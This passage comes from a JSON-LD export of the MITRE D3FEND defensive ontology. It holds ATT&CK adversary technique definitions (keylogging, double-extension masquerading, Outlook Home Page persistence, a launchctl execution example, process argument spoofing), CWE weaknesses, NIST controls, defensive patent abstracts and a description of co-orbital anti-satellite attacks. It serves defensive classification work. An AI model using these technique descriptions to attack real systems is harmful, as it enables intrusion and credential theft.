      "rdfs:label": "Reference - Method using kernel mode assistance for the detection and removal of threats which are actively preventing detection and removal from a running system - Symantec Corporation"
    },
    {
      "@id": "d3f:CWE-351",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-351",
      "d3f:definition": "The product does not properly distinguish between different types of elements in a way that leads to insecure behavior.",
      "rdfs:label": "Insufficient Type Distinction",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndApparatusForIncreasingTheSpeedAtWhichComputerVirusesAreDetected_McAfeeLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US5502815A"
      },
      "d3f:kb-abstract": "The method and apparatus for increasing the speed at which computer viruses are detected stores initial state information concerning the file or volume which is being examined for a virus. This information is stored in a cache in a non-volatile storage medium and when files are subsequently scanned for viruses, the current state information is compared to the initial state information stored in the cache. If the initial state information differs from the current state information then the file or volume is scanned for viruses which change the state information of the file or volume. If the initial state information and current state information is the same then the file or volume is scanned for a subset of viruses which do not change the state information.",
      "d3f:kb-author": "Paul D. Cozza",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "McAfee LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:kb-reference-title": "Method and apparatus for increasing the speed at which computer viruses are detected",
      "rdfs:label": "Reference - Method and apparatus for increasing the speed at which computer viruses are detected - McAfee LLC"
    },
    {
      "@id": "d3f:SetSystemConfigValue",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Set System Config Value",
      "rdfs:seeAlso": {
        "@id": "https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regsetvalueexa"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigSystemCall"
        },
        {
          "@id": "_:N8ea76bd3ddd44c098620dcb65eb60395"
        }
      ]
    },
    {
      "@id": "_:N8ea76bd3ddd44c098620dcb65eb60395",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:InternetNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Internet network traffic is network traffic that crosses a boundary between networks. [This is the general sense of inter-networking; It may or may not cross to or from the Internet]",
      "rdfs:label": "Internet Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:AccountLocking"
        },
        {
          "@id": "d3f:Multi-factorAuthentication"
        }
      ],
      "d3f:control-name": "Account Management | Automated System Account Management",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-2(1)"
    },
    {
      "@id": "_:N52bcce88f8b64d478051312d08a742b2",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:Classifying"
          },
          {
            "@id": "d3f:Forecasting"
          },
          {
            "@id": "d3f:Generation"
          },
          {
            "@id": "d3f:Matching"
          },
          {
            "@id": "d3f:Summarizing"
          }
        ]
      }
    },
    {
      "@id": "d3f:PasswordDatabase",
      "@type": "owl:Class",
      "d3f:definition": "A password database is a database that holds passwords for user accounts and is usually encrypted (i.e., the passwords are hashed). Password databases are found supporting system services (such as SAM) or as part of user applications such as password managers.",
      "rdfs:label": "Password Database",
      "rdfs:subClassOf": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:Reference-Tripwire",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://linux.die.net/man/8/tripwire"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:FileIntegrityMonitoring"
      },
      "d3f:kb-reference-title": "Reference - Tripwire",
      "rdfs:label": "Reference - Tripwire"
    },
    {
      "@id": "d3f:T1036.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.007",
      "d3f:definition": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension)",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Double File Extension",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:Nd653a2cbba19494ca92b9ae11a9b0672"
        }
      ]
    },
    {
      "@id": "_:Nd653a2cbba19494ca92b9ae11a9b0672",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:Password",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A password, sometimes called a passcode, is a memorized secret, typically a string of characters, usually used to confirm the identity of a user. Using the terminology of the NIST Digital Identity Guidelines, the secret is memorized by a party called the claimant while the party verifying the identity of the claimant is called the verifier. When the claimant successfully demonstrates knowledge of the password to the verifier through an established authentication protocol, the verifier is able to infer the claimant's identity.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Password"
      },
      "rdfs:label": "Password",
      "rdfs:subClassOf": {
        "@id": "d3f:Credential"
      },
      "skos:altLabel": "Passcode"
    },
    {
      "@id": "d3f:ATLASDefenseEvasionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0007"
      },
      "rdfs:label": "Defense Evasion Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N39e471b9ea7a4aa48fe28237866dab10"
        }
      ],
      "skos:prefLabel": "Defense Evasion Technique"
    },
    {
      "@id": "_:N39e471b9ea7a4aa48fe28237866dab10",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0007"
      }
    },
    {
      "@id": "d3f:BusNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:BusNetworkFrame"
      },
      "d3f:definition": "The ordered flow of frames, structured by a bus protocol, that traverses the shared bus medium during operation.",
      "rdfs:label": "Bus Network Traffic",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N16b99235617e4495ad78ce492a2f2147"
        }
      ]
    },
    {
      "@id": "_:N16b99235617e4495ad78ce492a2f2147",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetworkFrame"
      }
    },
    {
      "@id": "d3f:EX-0017.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0017.02",
      "d3f:definition": "A co-orbital ASAT uses a spacecraft already in space to conduct a deliberate collision or near-field detonation. After insertion, often well before any hostile action, the vehicle performs rendezvous and proximity operations to achieve the desired relative geometry, then closes to impact or triggers a kinetic or explosive device. Guidance relies on relative navigation (optical, lidar, crosslink cues) and precise timing to manage closing speeds and contact angle. Compared with direct-ascent shots, co-orbital approaches can loiter, shadow, or “stalk” a target for extended periods, masking as inspection or servicing until the terminal maneuver. Effects include mechanical disruption, fragmentation, or mission-ending damage, with debris characteristics shaped by the chosen altitude, closing velocity, and collision geometry.",
      "rdfs:label": "Co-Orbital ASAT - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0017/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0017"
      },
      "skos:prefLabel": "Co-Orbital ASAT"
    },
    {
      "@id": "d3f:T1583.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.004",
      "d3f:definition": "Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked)",
      "rdfs:label": "Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:FirmwareBehaviorAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FirmwareBehaviorAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Firmware"
      },
      "d3f:d3fend-id": "D3-FBA",
      "d3f:definition": "Analyzing the behavior of embedded code in firmware and looking for anomalous behavior and suspicious activity.",
      "d3f:kb-article": "## How it works\nFirmware behavior analysis provides protections by ensuring that installed firmware has not been tampered with or modified. Firmware analysis applies to mutable firmware and immutable read-only memory (ROMs).\n\nFirmware in deployed network devices is typically not analyzed and monitored for vulnerabilities and thus is subject to potential attacks. This technique makes use of known and measured behavioral attributes, including timing attributes, of analyzed firmware on deployed devices.\n\nA behavioral method that employs known timing measurements may use the timing results from a challenge and response protocol to detect the presence of malware in embedded firmware. Firmware device timing measurements are made, specific to the installed device, and are used in the verifying function.\n\nThe original firmware image is modified by injecting a monitoring software component into the embedded firmware code. The injected software components will allow for a software root of trust, the challenge and response protocol, to be implemented in the firmware.\n\nA challenge-response is issued and includes a nonce so that replays are not allowed. The firmware will calculate a checksum over all of memory, including the nonce, and return the result. The verification system will compare the computed checksum and the time it took for the computation of the checksum to determine if the firmware has been modified.\n\n## Considerations\n* The firmware code will need to be modified to include the behavioral monitoring functionality.\n* This technique is sensitive to the device the embedded firmware is hosted on and it is expected that the devices and firmware will need to be profiled and analyzed to determine timing estimation.\n* This technique is not expected to be one hundred percent correct as you would expect in a hardware root of trust solution and may require some tuning.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FirmwareBehaviorAnalysisConFirm"
        },
        {
          "@id": "d3f:Reference-FirmwareBehaviorAnalysisVIPER"
        }
      ],
      "d3f:synonym": "Firmware Timing Analysis",
      "rdfs:label": "Firmware Behavior Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N0f132d08f70743b58e8b12c17df90653"
        }
      ]
    },
    {
      "@id": "_:N0f132d08f70743b58e8b12c17df90653",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:T1415",
      "@type": "owl:Class",
      "d3f:attack-id": "T1415",
      "d3f:definition": "An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme). This technique, for example, could be used to capture OAuth authorization codes(Citation: IETF-PKCE) or to phish user credentials(Citation: MobileIron-XARA).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by",
      "rdfs:label": "URL Scheme Hijacking - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "URL Scheme Hijacking"
    },
    {
      "@id": "d3f:T1056.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:KeyboardInputDevice"
      },
      "d3f:attack-id": "T1056.001",
      "d3f:definition": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)",
      "rdfs:label": "Keylogging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1056"
        },
        {
          "@id": "_:N76baa75bfbd647e4b5e8977274ec56cb"
        }
      ]
    },
    {
      "@id": "_:N76baa75bfbd647e4b5e8977274ec56cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KeyboardInputDevice"
      }
    },
    {
      "@id": "d3f:T0864",
      "@type": "owl:Class",
      "d3f:attack-id": "T0864",
      "d3f:definition": "Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required.",
      "rdfs:label": "Transient Cyber Asset - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Transient Cyber Asset"
    },
    {
      "@id": "d3f:Clock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A mechanism that generates periodic, accurately spaced signals for timekeeping applications. Clocks may be implemented in hardware or software and are essential for system operations, synchronization, and event ordering.",
      "d3f:produces": {
        "@id": "d3f:TimeRecord"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://csrc.nist.gov/glossary/term/clock"
      },
      "rdfs:label": "Clock",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N82457e4960ed4ceba4610986ab46202b"
        }
      ]
    },
    {
      "@id": "_:N82457e4960ed4ceba4610986ab46202b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TimeRecord"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-3_8",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Malicious Code Protection | Detect Unauthorized Commands",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserBehaviorAnalysis"
      },
      "rdfs:label": "SI-3(8)"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodsThereofForCausalityIdentificationAndAttributionsDeterminationOfProcessesInANetwork_PaloAltoNetworksIncCyberSecdoLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170195350A1/en?oq=US-2017195350-A1"
      },
      "d3f:kb-abstract": "A system is used for detection of advanced persistent and non-persistent threats in a computerized environment. The system is connected to a plurality of user devices coupled to an enterprise's network. The system receives via an interface an electronic notification of at least one event in the operating system of the computer. The system then analyzes the at least one event. The system then generates a causality chain for the at least one event respective of the analysis. The causality chain comprises all the threads that attributed to the at least one event in a chronological order. The system then identifies a main thread that started the causality chain that led to the at least one event. Then, the system determines whether the main thread is associated with malicious software. Upon determination that the main thread is associated with malicious software, the causality chain is marked as infected.",
      "d3f:kb-author": "Gil BARAK",
      "d3f:kb-mitre-analysis": "This patent describes detecting malicious processes on a host. Agents are deployed on hosts that monitor all initiated processes and determine whether a process was initiated at boot or initiated by another process. If not initiated at boot or by another process, the process is identified as suspicious and an alert is triggered.",
      "d3f:kb-organization": "Palo Alto Networks IncCyber Secdo Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "System and methods thereof for causality identification and attributions determination of processes in a network",
      "rdfs:label": "Reference - System and methods thereof for causality identification and attributions determination of processes in a network - Palo Alto Networks IncCyber Secdo Ltd"
    },
    {
      "@id": "d3f:T1137.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1137.004",
      "d3f:definition": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)",
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfigurationDatabase"
      },
      "rdfs:label": "Outlook Home Page",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:Nad610944191c4428bc58082b7382e049"
        }
      ]
    },
    {
      "@id": "_:Nad610944191c4428bc58082b7382e049",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:T1581",
      "@type": "owl:Class",
      "d3f:attack-id": "T1581",
      "d3f:definition": "Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1627.001",
      "rdfs:label": "Geofencing - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1627.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Geofencing"
    },
    {
      "@id": "d3f:NetworkInitScriptFileResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A computer file resource made available from one host to other hosts on a computer network that is also an initialization script.",
      "rdfs:label": "Network Init Script File Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitScript"
        },
        {
          "@id": "d3f:NetworkFileResource"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1111",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1111",
      "d3f:definition": "The product's documentation does not adequately define inputs, outputs, or system/software interfaces.",
      "rdfs:label": "Incomplete I/O Documentation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1059"
      }
    },
    {
      "@id": "d3f:Reference-ControllerAreaNetworkMessageAuthentication",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180131522A1"
      },
      "d3f:kb-abstract": "Method and apparatus are disclosed for controller area network message authentication. An example disclosed vehicle includes a data bus and a first control unit communicatively coupled to the data bus. The example first control unit generates a secured message by (a) calculating a message authentication code, (b) truncating the message authentication code, (c) truncating a freshness value used to generate the message authentication code, and (d) placing portions of the truncated message authentication code and the truncated freshness value in separate portions of the secured message.",
      "d3f:kb-author": "James Martin Lawlis, Douglas A. Oliver, Xin Ye",
      "d3f:kb-mitre-analysis": "This patent describes a method for securing communication by calculating a MAC, truncating it, and also truncating a freshness value (counter) to fit within the restricted data field of a CAN frame (8 bytes).",
      "d3f:kb-organization": "Ford Global Technologies LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:BusMessageAuthentication"
      },
      "d3f:kb-reference-title": "Controller area network message authentication",
      "rdfs:label": "Reference - Controller area network message authentication - Ford Global Technologies LLC"
    },
    {
      "@id": "d3f:T1002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1002",
      "d3f:definition": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1560",
      "rdfs:label": "Data Compressed",
      "rdfs:seeAlso": {
        "@id": "d3f:T1560"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExfiltrationTechnique"
      }
    },
    {
      "@id": "d3f:NetworkConnectionResetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a previously opened network connection is reset.",
      "rdfs:label": "Network Connection Reset Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionEvent"
        },
        {
          "@id": "_:N89352acb408f471582104d0c8060e407"
        }
      ]
    },
    {
      "@id": "_:N89352acb408f471582104d0c8060e407",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkConnectionOpenEvent"
      }
    },
    {
      "@id": "d3f:T1564.010",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564.010",
      "d3f:definition": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)",
      "rdfs:label": "Process Argument Spoofing",
      "rdfs:subClassOf": {
        "@id": "d3f:T1564"
      }
    },
    {
      "@id": "d3f:T1001.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1001.002",
      "d3f:definition": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.",
      "rdfs:label": "Steganography",
      "rdfs:subClassOf": {
        "@id": "d3f:T1001"
      }
    },
    {
      "@id": "d3f:CWE-749",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-749",
      "d3f:definition": "The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.",
      "rdfs:label": "Exposed Dangerous Method or Function",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:M1029",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "IT disaster recovery plans are outside the current scope of D3FEND.",
      "rdfs:label": "Remote Data Storage"
    },
    {
      "@id": "d3f:T1174",
      "@type": "owl:Class",
      "d3f:attack-id": "T1174",
      "d3f:definition": "Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1556.002",
      "rdfs:label": "Password Filter DLL",
      "rdfs:seeAlso": {
        "@id": "d3f:T1556.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:T1152",
      "@type": "owl:Class",
      "d3f:attack-id": "T1152",
      "d3f:definition": "Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made  (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as <code>launchctl submit -l <labelName> -- /Path/to/thing/to/execute \"arg\" \"arg\" \"arg\"</code>. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1569.001",
      "rdfs:label": "Launchctl",
      "rdfs:seeAlso": {
        "@id": "d3f:T1569.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-568",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-568",
      "d3f:definition": "The product contains a finalize() method that does not call super.finalize().",
      "rdfs:label": "finalize() Method Without super.finalize()",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-459"
        },
        {
          "@id": "d3f:CWE-573"
        }
      ]
    },
    {
      "@id": "d3f:TA0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.",
      "d3f:display-order": 2,
      "rdfs:label": "Execution",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:CWE-536",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-536",
      "d3f:definition": "A servlet error message indicates that there exists an unhandled exception in your web application code and may provide useful information to an attacker.",
      "rdfs:label": "Servlet Runtime Error Message Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-211"
      }
    },
    {
      "@id": "d3f:CWE-590",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-590",
      "d3f:definition": "The product calls free() on a pointer to memory that was not allocated using associated heap allocation functions such as malloc(), calloc(), or realloc().",
      "d3f:weakness-of": {
        "@id": "d3f:MemoryFreeFunction"
      },
      "rdfs:label": "Free of Memory not on the Heap",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-762"
        },
        {
          "@id": "_:N6168edd005644bdca105924a0b94b2ed"
        }
      ]
    },
    {
      "@id": "_:N6168edd005644bdca105924a0b94b2ed",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "d3f:CWE-279",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-279",
      "d3f:definition": "While it is executing, the product sets the permissions of an object in a way that violates the intended permissions that have been specified by the user.",
      "rdfs:label": "Incorrect Execution-Assigned Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-732"
      }
    },
    {
      "@id": "d3f:DS0030",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A virtual server environment which runs workloads, hosted on-premises or by third-party cloud providers.",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Instance (ATT&CK DS)"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForDetectingHomoglyphAttacksWithASiameseConvolutionalNeuralNetwork_EndgameInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190019058A1/"
      },
      "d3f:kb-abstract": "The present invention utilizes computer vision technologies to identify potentially malicious URLs and executable files in a computing device. In one embodiment, a Siamese convolutional neural network is trained to identify the relative similarity between image versions of two strings of text. After the training process, a list of strings that are likely to be utilized in malicious attacks are provided (e.g., legitimate URLs for popular websites). When a new string is received, it is converted to an image and then compared against the image of list of strings. The relative similarity is determined, and if the similarity rating falls below a predetermined threshold, an alert is generated indicating that the string is potentially malicious.",
      "d3f:kb-author": "Jonathan Woodbridge; Anjum Ahuja; Daniel Grant",
      "d3f:kb-mitre-analysis": "This patent describes a mechanism to detect homoglyph strings that involves training a Siamese convolutional neural network to compare images of strings. Strings of legitimate URLs for websites, along with known suspicious strings, are converted to images during the training process to create an index. New strings are converted to images and then compared to the index for similarity; if a string deviates beyond a threshold, an alert is triggered.",
      "d3f:kb-organization": "Endgame Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:HomoglyphDetection"
      },
      "d3f:kb-reference-title": "System and method for detecting homoglyph attacks with a siamese convolutional neural network",
      "rdfs:label": "Reference - System and method for detecting homoglyph attacks with a siamese convolutional neural network - Endgame Inc"
    },
    {
      "@id": "d3f:CWE-543",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-543",
      "d3f:definition": "The product uses the singleton pattern when creating a resource within a multithreaded environment.",
      "rdfs:label": "Use of Singleton Pattern Without Synchronization in a Multithreaded Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-820"
      }
    },
    {
      "@id": "d3f:Reference-Wikipedia-MotionDetector",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://en.wikipedia.org/wiki/Motion_detector"
      },
      "d3f:kb-abstract": "Overview of motion detectors, including PIR and microwave technologies, applications, and limitations.",
      "d3f:kb-author": "Wikipedia contributors",
      "d3f:kb-reference-of": {
        "@id": "d3f:MotionSensorMonitoring"
      },
